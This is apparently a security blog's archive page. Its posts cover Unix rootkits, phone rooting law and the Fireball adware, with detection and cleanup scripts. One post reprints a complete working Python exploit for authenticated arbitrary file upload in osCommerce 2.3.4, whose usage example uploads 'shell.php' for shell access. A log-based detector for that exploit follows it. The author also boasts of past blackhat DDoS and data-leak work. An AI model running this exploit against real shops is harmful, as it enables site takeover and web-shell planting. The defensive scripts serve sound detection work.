Author Archives: admin

The Corporate World has no understanding of real Hackers – Windows Rootkits? Really?

The hubris of corporate security professionals and the arrogance of white-hat hackers have always been mocked by real hackers. School and certification training will teach you everything you need to know about hacking, security and defense, and about how the “script kiddies” operate.

There is such a disconnect between the real hacking world and the security community that it amuses me greatly. Having previously been a true blackhat hacker, paid to DDoS entire country uplinks or take out the competitors of major corporations discreetly and leak customer and other protected information to those undisclosed corporations, I speak from experience.

Real hackers DO NOT hack Windows; they trade root lists and shells, zero-day exploits, scanners and auto-rooters that the rest of the world is oblivious to. Windows hosts they infect for money, to use as proxy servers for hiding their identities, and to steal credentials and personal information – that is about it.

When I was in the game I used Windows hosts to steal their ISP login information and credentials for websites they were members of. The game is about hacking infrastructure: *nix servers, Cisco/Brocade routers, maintaining access, pivoting and compromising enclaves, and sniffing all traffic crossing the wire. Hackers do not care about home PC users, regardless of what the AV companies want you to believe. Crimeware actors care about Windows machines because they see dollar signs; hackers would be mocked and discredited if they bragged about hacking a Windows box.

For starters, hackers created rootkits in order to trojan utilities on Unix servers such as ps, netstat and lsof, and to scrub utmp/wtmp, so as to hide and preserve access and cover themselves from log analysis. To install one you would first have had to root the server. The root account only exists on *nix and Mac OS hosts, which always amuses hackers when the corporate security and commercial world talks about rootkitting Microsoft Windows hosts, where the superuser account is called Administrator. The name is a Unix term that does not fit Windows, but the technique does exist there: Windows kernel-mode malware hooks system calls and patches kernel structures to hide processes, files and network connections in exactly the same way.

Even the Microsoft site itself now describes rootkits this way:

What is a rootkit?

“Malware authors use rootkits to hide malware on your PC. Malware hidden by rootkits often monitor, filter, and steal your data or abuse your computer’s resources, such as using your PC for bitcoin mining.”
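As an added illustration (not from the original post), the classic way defenders catch the trojaned-ps trick described above is a cross-view comparison: ask the kernel for its process list via /proc, ask the ps binary for its list, and report anything the kernel knows about that ps does not. The script below runs that comparison on constructed sample data (the PIDs and command names are made up) and carries a live_check() for a real Linux host.

```python
"""Cross-view check for a process-hiding rootkit on Linux.

A user-land rootkit that replaces ps/netstat hides entries from those tools,
but not from the kernel's own /proc view. Comparing the two exposes the
hidden PIDs. The sample data at the bottom is constructed for the demo.
"""
import os
import re
import subprocess

# one line of `ps -eo pid,comm`: leading spaces, pid, spaces, command
_PS_LINE = re.compile(r"^\s*(\d+)\s+(\S.*?)\s*$")


def parse_ps_output(text):
    """Parse `ps -eo pid,comm` output into {pid: command}."""
    procs = {}
    for line in text.splitlines()[1:]:  # skip the header line
        m = _PS_LINE.match(line)
        if m:
            procs[int(m.group(1))] = m.group(2)
    return procs


def pids_from_proc_listing(entries):
    """Keep only the numeric directory names from a /proc listing."""
    return {int(e) for e in entries if e.isdigit()}


def find_hidden_pids(proc_pids, ps_procs):
    """PIDs the kernel reports that the ps binary does not (sorted)."""
    return sorted(proc_pids - set(ps_procs))


def live_check():
    """Run the same comparison on the current Linux host.

    /proc is re-checked afterwards so that processes which exited between
    the two snapshots are not reported as hidden.
    """
    proc_pids = pids_from_proc_listing(os.listdir("/proc"))
    ps_out = subprocess.run(["ps", "-eo", "pid,comm"],
                            capture_output=True, text=True, check=True).stdout
    candidates = find_hidden_pids(proc_pids, parse_ps_output(ps_out))
    return [pid for pid in candidates if os.path.exists("/proc/%d" % pid)]


# Constructed sample: the trojaned ps omits PIDs 4242 and 4243
SAMPLE_PROC_LISTING = ["1", "2", "1337", "4242", "4243", "self", "cpuinfo", "net", "sys"]
SAMPLE_PS_OUTPUT = """\
  PID COMMAND
    1 systemd
    2 kthreadd
 1337 sshd
"""

if __name__ == "__main__":
    hidden = find_hidden_pids(pids_from_proc_listing(SAMPLE_PROC_LISTING),
                              parse_ps_output(SAMPLE_PS_OUTPUT))
    print("hidden from ps:", hidden)  # [4242, 4243]
```

A kernel-mode rootkit that filters /proc itself defeats this user-land check; for that you compare against an out-of-band view such as a memory image or a boot from known-good media. The same idea applies to netstat versus /proc/net/tcp and to a login you can see in the auth log but not in `who`.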



Jailbreaking vs Rooting Smartphones: Android, iOS, and is it illegal?

In the USA, under the DMCA, it is legal to root your smartphone. The exemption was granted in the 2012 rulemaking, which covered phones but not tablets, so rooting a tablet was not covered at the time; the 2015 rulemaking extended the exemption to tablets. The exemptions are revisited every three years, so in 2016 the overall picture is still unclear.

Jailbreaking a phone and “rooting” a phone are not exactly the same thing; however, the common smartphone user who wishes to do either is typically only looking for the ability to load software and skins and make modifications to the phone without restriction.


One reason jailbreaking is so widespread is that it lets you truly customize your phone. By default, the iPhone’s app icons, taskbar, clock, lock screen, widgets, settings, etc. aren’t configured in a way that lets you change the colors, text and theme, but jailbroken devices can install custom skins and other tools.

Jailbroken devices can also be set up to let you remove apps that you can’t normally delete. For example, on some versions of the iPhone you can’t remove the Mail, Notes or Weather app, but jailbreak tools lift that restriction and truly remove those unwanted programs.


Rooting a smartphone means that you have root access on the device. Root is the superuser account name on UNIX and Linux operating systems. To achieve root access on an Android device, for instance, there needs to be a vulnerability that can be exploited to achieve privilege escalation, just as there would be if you started from an unprivileged user account on a Red Hat Linux machine. There have been such vulnerabilities in every release of the Android operating system so far, and this trend will most likely continue for some time. Once you have root on your Android device the sky really is the limit: you have full access to install or delete anything you wish, so BE CAREFUL! Bear in mind that the same access is available to any app you allow through the su manager, and that rooting usually breaks verified boot and official OTA updates.


The FIREBALL PUP, PUA, Adware or Malware Outbreak? Or just a successful Adware Campaign?

FIREBALL Adware or Malware?

The malware, called Fireball, acts as a browser hijacker and can be turned into a fully functioning malware downloader. Fireball is capable of executing any code on the victim machine, resulting in a wide range of actions from stealing credentials to dropping additional malware.
Fireball is spread mostly via bundling, i.e. installed on victim machines alongside a wanted program, often without the user’s consent.

Our current stance is that this is a Potentially Unwanted Program (PUP) or Potentially Unwanted Application (PUA), as it shares traits with both adware and malware. It performs questionable click-fraud-like activity, but it can also be uninstalled, which would be very rare for malware. Once the browser is closed all activity stops as well; that makes this more of a toolbar-adware type of deal, which typically doesn’t qualify for the full malware branding.



Malware typically requires the host to be re-imaged to completely destroy all pieces of it; FIREBALL, however, can be uninstalled... proof of adware on crack?


To remove almost any adware, follow these steps:

  1. Uninstall the adware by removing the application from the Programs and Features list in the Windows Control Panel.

For Mac OS users:

  a. Use the Finder to locate the application in the Applications folder.
  b. Drag the suspicious application to the Trash.
  c. Empty the Trash.

Note – The adware does not always register as an installed program and therefore may not appear in the program list.

  2. Scan and clean your machine, using:
  • Anti-Malware software
  • Adware cleaner software

  3. Remove malicious add-ons, extensions or plug-ins from your browser:

On Google Chrome:
  a. Click the Chrome menu icon and select Tools > Extensions.
  b. Locate and select any suspicious add-ons.
  c. Click the trash can icon to delete.

On Internet Explorer:
  a. Click the Settings icon and select Manage Add-ons.
  b. Locate and remove any malicious add-ons.

On Mozilla Firefox:
  a. Click the Firefox menu icon and go to the Tools tab.
  b. Select Add-ons > Extensions. A new window opens.
  c. Remove any suspicious add-ons.
  d. Go to the Add-ons manager > Plugins.
  e. Locate and disable any malicious plugins.

On Safari:
  a. Make sure the browser is active.
  b. Click the Safari tab and select Preferences. A new window opens.
  c. Select the Extensions tab.
  d. Locate and uninstall any suspicious extensions.

  4. Restore your internet browser to its default settings:

On Google Chrome:
  a. Click the Chrome menu icon and select Settings.
  b. In the On startup section, click Set Pages.
  c. Delete the malicious pages from the Startup pages list.
  d. Find the Show Home button option and select Change.
  e. In the Open this page field, delete the malicious search engine page.
  f. In the Search section, select Manage search engines.
  g. Select the malicious search engine page and remove it from the list.

On Internet Explorer:
  a. Select the Tools tab and then select Internet Options. A new window opens.
  b. In the Advanced tab, select Reset.
  c. Check the Delete personal settings box.
  d. Click the Reset button.

On Mozilla Firefox:
  a. Enable the browser Menu Bar by clicking the blank space near the page tabs.
  b. Click the Help tab, and go to Troubleshooting Information. A new window opens.
  c. Select Reset Firefox.

On Safari:
  a. Select the Safari tab and then select Preferences. A new window opens.
  b. In the Privacy tab, click the Manage Website Data… button. A new window opens.
  c. Click the Remove All button. This clears stored site data only; check the home page under the General tab and the search engine under the Search tab as well, since a hijacker changes those too.
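Added example (not part of the original post or of any vendor tool): the Chrome settings the steps above reset live in the profile's Preferences JSON file (on Windows, %LOCALAPPDATA%\Google\Chrome\User Data\Default\Preferences), so the same checks can be run from a script, which helps when triaging several machines. The JSON keys used below are the ones found in current Chrome profiles and are an assumption; the trusted-host list and the sample profile are constructed for the demo and are not real Fireball data.

```python
"""Audit a Chrome profile's Preferences JSON for browser-hijacker settings.

Checks the same four things the manual cleanup does: startup pages, home page,
default search engine and installed extensions, and reports anything that
points at a host outside the allow-list or was side-loaded from disk.
"""
import json
from urllib.parse import urlsplit

# Hosts considered legitimate for this profile (assumption: tune per environment)
TRUSTED_HOSTS = {"www.google.com", "www.bing.com", "duckduckgo.com", "intranet.example.com"}


def _host(url):
    return (urlsplit(url).hostname or "").lower()


def _untrusted(url):
    """True for a non-empty URL whose host is not on the allow-list."""
    return bool(url) and _host(url) not in TRUSTED_HOSTS


def audit_preferences(prefs):
    """Return a list of (setting, value) pairs that look hijacked."""
    findings = []

    # restore_on_startup == 4 means "open a specific set of pages" (assumed key/value)
    session = prefs.get("session", {})
    if session.get("restore_on_startup") == 4:
        for url in session.get("startup_urls", []):
            if _untrusted(url):
                findings.append(("startup_url", url))

    # home page only matters when the home button does not open the new-tab page
    if not prefs.get("homepage_is_newtabpage", True) and _untrusted(prefs.get("homepage", "")):
        findings.append(("homepage", prefs["homepage"]))

    # default search provider template, e.g. "https://host/q={searchTerms}"
    dsp = prefs.get("default_search_provider_data", {}).get("template_url_data", {})
    if _untrusted(dsp.get("url", "")):
        findings.append(("default_search", dsp["url"]))

    # extensions loaded from disk rather than the Web Store are the usual adware carriers
    for ext_id, ext in prefs.get("extensions", {}).get("settings", {}).items():
        if not ext.get("from_webstore", False):
            findings.append(("sideloaded_extension", "%s %s" % (ext_id, ext.get("path", ""))))
    return findings


def audit_preferences_file(path):
    """Load a Preferences file from disk and audit it."""
    with open(path, encoding="utf-8") as fh:
        return audit_preferences(json.load(fh))


# Constructed sample profile modelled on a hijacked browser (not real Fireball data)
SAMPLE_PREFS = {
    "session": {"restore_on_startup": 4,
                "startup_urls": ["http://search.example-hijack.test/?src=fb"]},
    "homepage": "http://search.example-hijack.test/",
    "homepage_is_newtabpage": False,
    "default_search_provider_data": {"template_url_data": {
        "short_name": "Search",
        "url": "http://search.example-hijack.test/q={searchTerms}"}},
    "extensions": {"settings": {
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {"from_webstore": True, "path": "aaaa\\1.0_0"},
        "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": {"from_webstore": False,
                                             "path": "C:\\ProgramData\\Hijack\\ext"}}},
}

if __name__ == "__main__":
    for setting, value in audit_preferences(SAMPLE_PREFS):
        print("[!] %s: %s" % (setting, value))
```

Run it with the browser closed and treat it as a triage aid only: Chrome also keeps extension state in the Secure Preferences file and protects it with a MAC, so do not edit these files by hand; let the browser's own UI make the changes as in the steps above.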



What is the Difference between Adware and Malware FIREBALL / Elex – WHAT YOU NEED TO KNOW!

A question I am frequently asked is what the difference is between adware (legal software that will nevertheless overload you with ads to make money) and malware (crimeware, to be specific). Typically there is a fine line between the two. A good example of a successful adware company is OpinionSpy/MarketScore, which bundles its adware with legitimate software commonly downloaded from free download sites; the company has served ads to its downloaders for over ten years now. You can see our article on it here:

Analysis OSSProxy MarketScore OpinionSpy Adware/PUP/Trojan/Malware comScore vs Nielsen


You will notice that adware has a key distinction: it has to include a user agreement (typically the long policy statement you click through when installing software) and it has to be removable without a third-party program like Malwarebytes or another AV vendor’s tool. Adware is usually hosted on friendly infrastructure such as cloud services or known and trusted dedicated hosting providers, including the $1/month shared hosting offers from the likes of GoDaddy. Typically the adware is backed by a corporation or business and hosted in a country like the United States, where, if it did anything illegal, the domain and business would be seized.

Adware does not have a malicious incentive; it has a monetary one. It wants to generate revenue from ads, clicks or software downloads, or from selling your information to third parties for marketing. Adware will not steal sensitive information, though it may track your browsing habits, which it typically does using persistent cookies.

Malware, on the other hand, cannot be uninstalled from the Control Panel in practically every instance. The goal is to use compromised hosts to install software without the user’s knowledge or permission and generate revenue: steal passwords and sensitive information such as banking details or credit cards, use your internet connection for DDoS, and resell botnets.

Infection vectors typically include malspam e-mails, exploit kits and exploitation, as well as social engineering. Rarely will true malware be in a software bundle, as the bundler would have to be in on the scheme. Malware infrastructure typically consists of hacked hosts or shady hosting. Adware will show a running process in Task Manager; malware will typically hide its process by trojaning system tools, or will not allow you to kill the malware process or uninstall it.

A follow-up article on the recent FIREBALL discussion (is it malware or adware?) is on its way now that we have covered the basic nature of adware and crimeware.


E-Commerce PHP Shopping Cart Script osCommerce – Arbitrary File Upload Vulnerability Exploit Code
# Exploit Title: osCommerce Authenticated Arbitrary File Upload
# Date: 11.11.2017
# Exploit Author: Simon Scannell - <>
# Vendor Homepage:
# Software Link:
# Version: 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows
#
# osCommerce does by default not allow users to upload arbitrary files from the Admin Panel. However, any user
# privileged enough to send newsletters can exploit an object injection in the osCommerce core to
# upload any file, allowing the user to gain shell access. The user does not need to be an administrator;
# any account with access to the newsletters will do.
# More details can be found here:

import argparse
import sys
from urllib.parse import urlparse

import requests

DEFAULT_ADMIN_URL = "/catalog/admin/"
DEFAULT_NEWSLETTER_SCRIPT = "/catalog/admin/newsletters.php"


# Builds an authenticated session and returns it if it was successful
def authenticate(username, password, url):
    # Build the session and grab the initial cookie
    session = requests.Session()
    session.get(url + "login.php", allow_redirects=False)

    get_params = {"action": "process"}
    data = {"username": username, "password": password}

    # Attempt the authentication; osCommerce answers a successful login with a 302 redirect
    r = session.post(url + "login.php", data=data, params=get_params, allow_redirects=False)
    if r.status_code == 302:
        return session
    return False


def upload_file(local_filename, session, url):
    newsletter_script = url + "newsletters.php"
    session.get(newsletter_script, params={"action": "new"})

    # module=upload is the injected object: 'title' becomes the multipart field name the
    # upload class reads from, and 'content' the directory it writes the file to
    payload = {
        "module": "upload",
        "title": "uploaded_fname",
        "content": "./",
    }

    # Create the vulnerable newsletter and grab its ID from the redirect (Location: ...?nID=<id>)
    r = session.post(newsletter_script, params={"action": "insert"}, data=payload, allow_redirects=False)
    try:
        newsletter_id = urlparse(r.headers["Location"]).query[4:]
        print("[+] Successfully prepared the exploit and created a new newsletter with nID %s" % newsletter_id)
    except KeyError:
        print("[-] The script wasn't able to create a new newsletter")
        sys.exit(1)

    # Now lock the newsletter
    session.get(newsletter_script, params={"action": "lock", "nID": newsletter_id})
    print("[+] Successfully locked the newsletter. Now attempting to upload..")

    # Send the final request, containing the file!
    with open(local_filename, "rb") as fh:
        files = {"uploaded_fname": fh}
        session.post(newsletter_script, params={"action": "send", "nID": newsletter_id}, files=files)

    print("[*] Now trying to verify that the file %s uploaded.." % local_filename)
    shell_url = url + local_filename
    r = requests.get(shell_url)
    if r.status_code == 200:
        print("[+] Got a HTTP 200 Reply for the uploaded file!")
        print("[+] The uploaded file should now be available at %s" % shell_url)
    else:
        print("[-] Got HTTP %d for %s; the upload may have failed" % (r.status_code, shell_url))


# Main routine starts here
if __name__ == "__main__":
    usage = "%s -u TARGET_URL -a AUTH -f FILE [-p ADMIN_PATH]\n\n" \
            "Example: %s -u http://localhost/path/to/osCommerce --auth=admin:admin_password -f shell.php\n\n" \
            "NOTE: For a more detailed description on the arguments use the -h switch\n\n\n" % (sys.argv[0], sys.argv[0])
    parser = argparse.ArgumentParser(description="osCommerce 2.3.4 Authenticated Arbitrary File Upload", usage=usage)
    parser.add_argument("-u", "--target-url", help="The target URL, including the path to the osCommerce installation (can also be document root /)", required=True)
    parser.add_argument("-a", "--auth", help="Credentials for a privileged user in the format of username:password", required=True)
    parser.add_argument("-f", "--file", help="The local file to be uploaded to the vulnerable webhost", required=True)
    parser.add_argument("-p", "--admin-path", help="The path for the osCommerce Admin Area. This defaults to /catalog/admin/", required=False)
    args = parser.parse_args()

    # Parse username and password (split once, so passwords containing ':' survive)
    username, password = args.auth.split(":", 1)
    url = args.target_url

    # If the user hasn't passed a path to the osCommerce Admin Panel, use the default
    url += args.admin_path if args.admin_path else DEFAULT_ADMIN_URL

    # Authenticate the user and establish the connection
    session = authenticate(username, password, url)
    if not session:
        print("[-] The script wasn't able to authenticate itself to osCommerce. Are you sure that the credentials are correct? Is %s the Admin Path?" % (url + "login.php"))
        sys.exit(1)
    print("[+] Authentication successful")

    upload_file(args.file, session, url)
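Added example (not from the advisory and not osCommerce code): the exploit above leaves a fixed footprint in the web server's access log, so a defender can hunt for it. The client first POSTs newsletters.php?action=send&nID=<n> and then fetches the .php it just planted from the admin directory. Locking and sending a newsletter is a normal admin workflow, so the script only alerts when the send is followed by a 200 for a .php name that is not one of osCommerce's own admin scripts. The log lines, client addresses and the partial baseline of known admin scripts below are constructed for the demo; extend the baseline from a clean install.

```python
"""Hunt for the osCommerce newsletter-upload exploit chain in Apache access logs."""
import re
from urllib.parse import urlsplit, parse_qs

ADMIN_DIR = "/catalog/admin/"
# Partial baseline of scripts that legitimately live in the admin directory
# (assumption: list it from a clean osCommerce 2.3.4 install before relying on it)
KNOWN_ADMIN_SCRIPTS = {"login.php", "index.php", "newsletters.php", "categories.php",
                       "orders.php", "customers.php", "configuration.php", "logoff.php"}

# Apache combined-format prefix: client, ident, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    parts = urlsplit(target)
    return {"ip": ip, "ts": ts, "method": method, "path": parts.path,
            "query": parse_qs(parts.query), "status": int(status)}


def is_newsletter_send(rec):
    """POST newsletters.php?action=send&nID=<n>: the request that writes the upload."""
    return (rec["method"] == "POST" and rec["path"] == ADMIN_DIR + "newsletters.php"
            and rec["query"].get("action") == ["send"] and "nID" in rec["query"])


def is_unknown_admin_php(rec):
    """A 200 for a .php directly under the admin dir that is not a stock admin script."""
    if not rec["path"].startswith(ADMIN_DIR):
        return False
    name = rec["path"][len(ADMIN_DIR):]
    return (name.endswith(".php") and "/" not in name
            and name not in KNOWN_ADMIN_SCRIPTS and rec["status"] == 200)


def detect(lines):
    """Return (ip, nID, fetched_path) for each client that sent a newsletter
    and then retrieved an unknown .php from the admin directory."""
    armed = {}  # ip -> nID of that client's most recent newsletter 'send'
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if is_newsletter_send(rec):
            armed[rec["ip"]] = rec["query"]["nID"][0]
        elif rec["ip"] in armed and is_unknown_admin_php(rec):
            alerts.append((rec["ip"], armed.pop(rec["ip"]), rec["path"]))
    return alerts


# Constructed sample log: one exploit run from 203.0.113.5, one legitimate admin from 198.51.100.9
SAMPLE_LOG = """\
203.0.113.5 - - [11/Nov/2017:10:00:01 +0000] "POST /catalog/admin/login.php?action=process HTTP/1.1" 302 -
203.0.113.5 - - [11/Nov/2017:10:00:02 +0000] "POST /catalog/admin/newsletters.php?action=insert HTTP/1.1" 302 -
203.0.113.5 - - [11/Nov/2017:10:00:03 +0000] "GET /catalog/admin/newsletters.php?action=lock&nID=7 HTTP/1.1" 200 4120
203.0.113.5 - - [11/Nov/2017:10:00:04 +0000] "POST /catalog/admin/newsletters.php?action=send&nID=7 HTTP/1.1" 200 3980
203.0.113.5 - - [11/Nov/2017:10:00:05 +0000] "GET /catalog/admin/shell.php HTTP/1.1" 200 512
198.51.100.9 - - [11/Nov/2017:10:05:00 +0000] "POST /catalog/admin/newsletters.php?action=send&nID=8 HTTP/1.1" 200 3980
198.51.100.9 - - [11/Nov/2017:10:05:01 +0000] "GET /catalog/admin/orders.php HTTP/1.1" 200 9001
""".splitlines()

if __name__ == "__main__":
    for ip, nid, path in detect(SAMPLE_LOG):
        print("[!] %s sent newsletter nID=%s then fetched %s" % (ip, nid, path))
```

The upload lands wherever the injected 'content' path points, so if the attacker chose a directory other than the admin one the final GET will be elsewhere; widen is_unknown_admin_php to the web root, with a larger baseline, if your logs show that. The POST body (module=upload) is not in the access log, which is why the chain is keyed on the query string and the follow-up fetch instead.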

